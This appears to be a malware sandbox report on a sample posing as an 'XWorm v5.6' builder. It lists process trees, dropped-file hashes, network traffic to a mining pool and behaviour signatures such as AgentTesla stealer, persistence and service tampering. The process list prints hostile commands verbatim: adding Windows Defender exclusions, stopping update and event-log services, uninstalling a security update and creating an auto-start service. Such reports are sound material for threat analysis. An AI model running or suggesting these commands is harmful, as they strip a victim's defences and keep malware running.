C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -Embedding

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "MCDRJPTJ"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "MCDRJPTJ" binpath= "C:\ProgramData\Xworm_Bypass.exe" start= "auto"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "996761466828560643914515844-705127546-8625178171779974019-1939520030-258622825"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "MCDRJPTJ"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20673050811822855843-1408530781963846042-2819605201571374581-605189935589228638"

C:\ProgramData\Xworm_Bypass.exe

C:\ProgramData\Xworm_Bypass.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-50153917116707656141849574502-387207486-1241545743833005897-994040039-169671173"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-886804050-1680268229-19655389981696649114-7221903401937688591-408691450-928899127"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 eu.ss.btc.com udp
US 172.65.222.110:1800 eu.ss.btc.com tcp
US 172.65.222.110:1800 eu.ss.btc.com tcp
US 172.65.222.110:1800 eu.ss.btc.com tcp
US 172.65.222.110:1800 eu.ss.btc.com tcp
US 172.65.222.110:1800 eu.ss.btc.com tcp
US 172.65.222.110:1800 eu.ss.btc.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

MD5 d626f885874892781aa6efcc7e0c2a69
SHA1 09f2aeab8f4618f26471261a746bad43bfc917ff
SHA256 df512cabbda87f7630eaa05abce3b84698a00a36d41222a95649f851d3317a1f
SHA512 26695528d81a1cf737d9337f11ca29fcbb7defb0418002e955501d7048c597cf23330be7bc49d33eceead020eb3a3e752d6a6c048ee54aa23c9e1981a520aa63

\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

MD5 cbf264fda371ab41dccd5e100b59a2cb
SHA1 b0cea8c96cd73b6b085f5ef59ea820b120053754
SHA256 6e330ee9b36579c504acb6485d5be7e9a529713ca70e83fe15cfb36bc76584ed
SHA512 f2af35828d2074c3325eeb8fc0e0694fcbcdd844be630c0fa292276a32f2ec99eb599f9f035ba33204df31f4a368f248c60f35f2cf1df3eb929fe49cf77e6b7e

memory/2952-18-0x000007FEF5453000-0x000007FEF5454000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

MD5 fdd34dc8e5f2c59153cea0c37646ca8d
SHA1 7e8965a1bbd74f8f999f4dd94a66f9d240b8c7ab
SHA256 99704a3fbd648ef8449232da2768920ac86345939d789d918150fa52d72c1d7e
SHA512 980da4844bc0a2434978d9477b850198eab8fdd8f4272abcd50a2df3ef6a7d73f5d3928a73d747e67a15cf0ec9cd6b285df3bcf0b796536f34fe343701f82007

C:\Users\Admin\AppData\Local\Temp\_MEI10682\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

memory/2952-121-0x0000000000D90000-0x0000000002648000-memory.dmp

memory/2548-124-0x000007FEF37E0000-0x000007FEF3EB9000-memory.dmp

memory/2952-125-0x000000001CE30000-0x000000001D024000-memory.dmp

memory/2952-126-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/2952-127-0x000000001D820000-0x000000001E448000-memory.dmp

memory/2548-128-0x000007FEF37E0000-0x000007FEF3EB9000-memory.dmp

memory/1260-136-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/1260-135-0x000000001B5B0000-0x000000001B892000-memory.dmp

memory/276-138-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1248-228-0x00000000025E0000-0x0000000002604000-memory.dmp

memory/1248-226-0x00000000025E0000-0x0000000002604000-memory.dmp

memory/428-154-0x00000000370E0000-0x00000000370F0000-memory.dmp

memory/428-153-0x000007FEBD570000-0x000007FEBD580000-memory.dmp

memory/1988-381-0x00000000009A0000-0x00000000009A8000-memory.dmp

memory/1988-380-0x000000001A080000-0x000000001A362000-memory.dmp

memory/428-152-0x0000000000CD0000-0x0000000000CFB000-memory.dmp

memory/276-144-0x00000000770A0000-0x0000000077249000-memory.dmp

memory/276-146-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-145-0x0000000076E80000-0x0000000076F9F000-memory.dmp

memory/276-143-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-141-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-140-0x0000000140000000-0x000000014002B000-memory.dmp

memory/276-139-0x0000000140000000-0x000000014002B000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 53b0c097ec11172f0c9adfeda3acf39b
SHA1 a93a21d93754c71768f5a553543ced1054578fd3
SHA256 65e6ccd768afc973580bcfe6969c4dc7e4055dff21333d3e41bc88e2352b44dc
SHA512 125d85649ec095e569a1d3e49dc7cdd8c90a5751ce21863e5635d92e978fdf9a32a5f587dd2bb02ce874b5885bf20e7e89955cd8f1e3c6cbb0cecb28227cf772

memory/2952-581-0x000007FEF5453000-0x000007FEF5454000-memory.dmp

memory/2952-675-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

C:\Windows\System32\perfc011.dat

MD5 1f998386566e5f9b7f11cc79254d1820
SHA1 e1da5fe1f305099b94de565d06bc6f36c6794481
SHA256 1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea
SHA512 a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

C:\Windows\System32\wbem\Performance\WmiApRpl.ini

MD5 46d08e3a55f007c523ac64dce6dcf478
SHA1 62edf88697e98d43f32090a2197bead7e7244245
SHA256 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614
SHA512 b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

C:\Windows\System32\perfh009.dat

MD5 1c678ee06bd02b5d9e4d51c3a4ec2d2b
SHA1 90aa7fdfaaa37fb4f2edfc8efc3994871087dedb
SHA256 2d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3
SHA512 ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32

C:\Windows\System32\perfh00A.dat

MD5 7d0bac4e796872daa3f6dc82c57f4ca8
SHA1 b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a
SHA256 ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879
SHA512 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

C:\Windows\System32\perfc00A.dat

MD5 540138285295c68de32a419b7d9de687
SHA1 1cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56
SHA256 33867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb
SHA512 7c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a

C:\Windows\System32\perfh007.dat

MD5 5026297c7c445e7f6f705906a6f57c02
SHA1 4ec3b66d44b0d44ec139bd1475afd100748f9e91
SHA256 506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc
SHA512 5be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d

C:\Windows\System32\perfc007.dat

MD5 0f3d76321f0a7986b42b25a3aa554f82
SHA1 7036bba62109cc25da5d6a84d22b6edb954987c0
SHA256 dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460
SHA512 bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0

C:\Windows\System32\perfh011.dat

MD5 54c674d19c0ff72816402f66f6c3d37c
SHA1 2dcc0269545a213648d59dc84916d9ec2d62a138
SHA256 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5
SHA512 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

C:\Windows\System32\perfh010.dat

MD5 4623482c106cf6cc1bac198f31787b65
SHA1 5abb0decf7b42ef5daf7db012a742311932f6dad
SHA256 eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349
SHA512 afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

C:\Windows\System32\perfc010.dat

MD5 d73172c6cb697755f87cd047c474cf91
SHA1 abc5c7194abe32885a170ca666b7cce8251ac1d6
SHA256 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57
SHA512 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

C:\Windows\System32\perfh00C.dat

MD5 5f684ce126de17a7d4433ed2494c5ca9
SHA1 ce1a30a477daa1bac2ec358ce58731429eafe911
SHA256 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c
SHA512 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

C:\Windows\System32\perfc00C.dat

MD5 ce233fa5dc5adcb87a5185617a0ff6ac
SHA1 2e2747284b1204d3ab08733a29fdbabdf8dc55b9
SHA256 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31
SHA512 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-15 10:23

Reported

2024-07-15 10:25

Platform

win10v2004-20240709-en

Max time kernel

18s

Max time network

24s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
